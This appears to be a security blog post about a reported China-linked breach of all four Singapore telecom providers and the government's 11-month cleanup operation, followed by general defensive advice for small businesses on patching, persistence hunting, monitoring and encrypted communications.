China Hacked All Four Singapore Telecoms. The Operation Took 11 Months to Clean Up.
UNC3886 used zero-days and rootkits to breach every major telecom provider in Singapore. The government ran an 11-month counteroperation called CYBER GUARDIAN. If state actors can own an entire country's telecom, what chance does your business have without help?
#Every telecom in the country. All four. At the same time.
In February 2026, Singapore's Cyber Security Agency revealed that a China-linked threat group tracked as UNC3886 had breached all four of Singapore's major telecommunications providers. Not one. Not two. All of them.
The attackers used zero-day exploits and custom rootkits to gain persistent access. "Persistent" meaning they were embedded so deeply that the Singaporean government had to run an 11-month counteroperation called CYBER GUARDIAN to fully eradicate them.
Eleven months. An entire country's cybersecurity apparatus working for nearly a year to clean up one intrusion. That's how deep the attackers got.
#Why telecoms matter.
Telecom providers carry the communications of an entire population. Phone calls, text messages, internet traffic, metadata about who talks to whom and when. Intelligence agencies target telecoms because compromising one gives you surveillance capabilities over an entire country.
But this isn't just an intelligence problem. It's a business problem. Because your business depends on telecom infrastructure:
- Your phone calls go through telecom networks
- Your internet traffic goes through telecom networks
- Your VPN connections go through telecom networks
- Your cloud services are reachable through telecom networks
If the telecom is compromised, the attacker can potentially intercept, redirect, or monitor any of that traffic. Including yours.
#The lesson for businesses that aren't telecoms.
If a nation-state can breach all four telecoms in a technologically advanced country like Singapore, the question isn't whether sophisticated attackers can breach your network. They can. The question is whether you've done enough to make it difficult, detect it quickly, and limit the damage.
Zero-days and custom rootkits are nation-state tools. Most businesses won't face that level of adversary. But the principles that make those attacks successful apply at every level:
Unpatched systems are entry points. The zero-days used against Singapore's telecoms were unpatched vulnerabilities. Your unpatched firewall, your unpatched Exchange server, your unpatched WordPress are entry points for the attackers that target businesses your size.
Persistence means the attacker comes back. Rootkits let the Singapore attackers survive reboots, updates, and even some remediation attempts. At the small business level, persistence looks like a backdoor user account nobody notices, a scheduled task that re-downloads malware, or a modified startup script. If your incident response doesn't include thorough persistence hunting, the attacker comes back.
Detection is the difference. Singapore detected the breach and spent 11 months remediating. Many businesses never detect the breach at all. The average dwell time for small businesses is 197 days. That's over six months of an attacker living in your systems before anyone notices.
#What to do.
- Assume breach. Plan for detection and response, not just prevention. Firewalls and antivirus are prevention. Monitoring, EDR, and incident response plans are detection and response. You need both.
- Encrypt sensitive communications. Don't rely solely on the telecom to protect your data in transit. Use end-to-end encrypted communications for sensitive business discussions. Signal for messaging. Encrypted email (S/MIME or PGP) for confidential documents.
- Use a VPN for sensitive operations. A VPN doesn't protect against a compromised telecom (the VPN tunnel still travels over their network), but it does encrypt the contents so interception yields encrypted data rather than plaintext.
- Monitor for anomalous network behavior. Connections to unexpected countries, unusual data transfer volumes, DNS queries to suspicious domains. Wazuh and Pi-hole can help at the small business level.
- Patch everything. The attackers used zero-days, but most businesses get breached through known vulnerabilities with available patches. You can't prevent zero-days, but you can close every known hole. Subscribe to CISA KEV for what's actively exploited.
#Further reading
- Singapore CSA: CYBER GUARDIAN - Singapore's cybersecurity response
- Mandiant: UNC3886 - threat actor tracking and analysis
- Signal - end-to-end encrypted messaging
- Wazuh - open source network monitoring
- CISA KEV Catalog - actively exploited vulnerabilities